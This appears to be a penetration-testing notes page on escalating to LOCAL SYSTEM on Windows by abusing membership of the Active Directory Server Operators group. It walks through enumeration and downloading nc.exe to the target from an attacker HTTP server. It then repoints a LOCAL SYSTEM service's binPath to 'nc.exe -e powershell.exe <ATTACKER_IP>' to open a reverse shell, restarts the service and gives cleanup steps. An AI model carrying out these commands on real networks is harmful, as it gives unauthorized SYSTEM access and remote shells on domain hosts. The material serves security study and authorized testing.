PRIMARY CATEGORY → WINDOWS PRIVESC • SECURITY GROUPS
Theory
The Server Operators group is an Active Directory Security Group, also known as Privileged Groups
The main function of this group is basically to allow certain users to perform some administrative tasks without make them part of the Administrators Group or making them Domain Admins
Among the privileges enjoyed by members of this group, the following are highlighted
- Start, Stop and Restart Services
SERVICE_ALL_ACCESS
- Shutting down and Switching On Servers, including DCs
- Manage Shared Resources
- Backup and Restore Files in the Domain Controller
- Remote Access to the Domain Controller through Administration Tools
Default Privileges
SeInteractiveLogonRight # DC Login
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilegeEnumeration
Listing the Groups to which the Current User belongs
whoami /groups
net user <USER>Members of Server Operators
net localgroup "Backup Operators"Code Execution as LOCAL SYSTEM
Workflow
As mentioned, a domain user account member of this group is able to manage local services as it is granted with the SERVICE_ALL_ACCESS right over them
Therefore, if we compromise a principal that belongs to the Server Operators group, we can leverage the given domain user account to replace the Binary Path of a local service running as LOCAL SYSTEM with a malicious payload
Then, we restart the service and it’s over, we gain code execution as LOCAL SYSTEM
Requirements
-
The compromised principal must belong to the Server Operators group
-
The Server Operators Group must have the
SERVICE_ALL_ACCESSright over a local service that runs as LOCAL SYSTEM
SERVICE_CHANGE_CONFIG and SERVICE_START specifically
Abuse - Windows
Checking Group Membership
Once a shell is obtained in the Remote Host as a non-privileged user, simply check if the current user belongs to the Server Operators Group
whoami /groups | findstr /I 'Server Operators'If not, just check which system users belong to this group and try to pivot to one of them
Get-ADGroupMember -Identity "Server Operators"
net group /domain "Server Operators"Identifying a Local Service running as LOCAL SYSTEM
If Evil-WinRM is used to establish a connection to the target via WinRM, use the following tool-specific command to list the running services and the path of their associated binary
servicesIf not →
CMD & PS
Get-CimInstance win32_service -Filter 'StartName = "localsystem"' | Select Name, pathNameChoose a non-critical service to modify its binary path to the path of the malicious binary we will upload
Retrieving Information about the given service
CMD & PS
sc.exe qc '<SERVICE_NAME>'PS
Get-CimInstance -ClassName win32_service -Filter 'Name="<SERVICE_NAME>"' -Property *Checking the Service’s current DACL
CMD & PS
icacls '<BIN_PATH>'PS
Get-ACL -Path '<BIN_PATH>' | Select -ExpandProperty accessToStringMalicious Binary Setup
- Downloading the binary
From the attacker ⚔️
curl --silent --location --request GET --output 'nc.exe' 'https://github.com/int0x33/nc.exe/raw/refs/heads/master/nc64.exe'- Transferring it to the target
From the attacker ⚔️
python3 -m http.server 80From the target 🎯
mkdir C:\Windows\Temp\LPE
cd C:\Windows\Temp\LPEIWR -UseBasicParsing -Uri 'http://<ATTACKER_IP>/nc.exe' -OutFile 'C:\Windows\Temp\LPE\nc.exe'Modifying the Binary Path of the Service
Modify the default binary path of the service to that of nc.exe by passing it the following arguments to send a reverse shell to the attacker machine
sc.exe config <SERVICE> binPath="C:\Windows\Temp\LPE\nc.exe -e powershell.exe <ATTACKER_IP> <ATTACKER_PORT>"Setting up a TCP Listener
From the attacker ⚔️
rlwrap -CaR nc -nlvp <PORT>Restarting the service
Once the binary path of the previous service has been modified, simply restart the service having previously set up a listening TCP port on the attacker
sc.exe stop <SERVICE>
sc.exe start <SERVICE>Cleanup - Windows
Bin Path Restoration
sc.exe config <SERVICE> binPath="<LEGITIMATE_BIN_PATH>"Service Restart
Only stop the service if it was already stopped
sc.exe stop <SERVICE>
sc.exe start <SERVICE>